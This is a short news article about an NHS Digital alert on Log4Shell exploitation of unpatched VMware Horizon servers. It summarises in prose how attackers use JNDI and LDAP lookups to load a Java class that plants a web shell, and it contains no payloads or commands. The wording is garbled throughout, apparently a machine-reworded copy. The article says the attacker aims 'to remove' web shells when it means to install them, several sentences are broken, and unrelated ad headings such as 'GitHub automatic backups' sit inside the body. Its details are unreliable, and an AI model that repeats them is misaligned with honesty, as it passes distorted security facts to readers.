NHS warns of hackers targeting Log4j flaws in VMware Horizon


The UK’s National Health Service (NHS) digital security team has sounded the alarm over the active exploitation of Log4Shell vulnerabilities in unpatched VMware Horizon servers by an unknown threat actor to remove malicious web shells and establish persistence on affected networks for tracking attacks.

“The attack likely consists of a reconnaissance phase, during which the attacker uses Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to recall malicious infrastructure,” the non-ministerial public body said in a brief. alert. “Once a weakness has been identified, the attack then uses Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”

GitHub automatic backups

The web shell, once deployed, can act as a conduit to perform a host of post-exploitation activities such as deploying additional malware, exfiltrating data, or deploying ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to Log4j vulnerabilities.

Horizon VMware

Log4Shell is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical arbitrary remote code execution flaw in Apache Log4j 2, a ubiquitous open source logging framework, which was used in the framework various malware campaigns since it was revealed in December 2021. A range of hacking groups, from state actors to ransomware cartels, have pounced on the vulnerability to date.

Prevent data breaches

This development also marks the second release of VMware products due to vulnerabilities in the Log4j library. Last month, researchers at AdIntel revealed that attackers were targeting systems running VMware VCenter servers in an attempt to install Conti ransomware.

VMware, for its part, already released security updates for Horizon, VCenter and other products last month that have been impacted by Log4Shell, the virtualization service provider acknowledging scans attempts in the wild, urging customers to install hotfixes if necessary or to apply workarounds temporarily to counter any potential risk.


Comments are closed.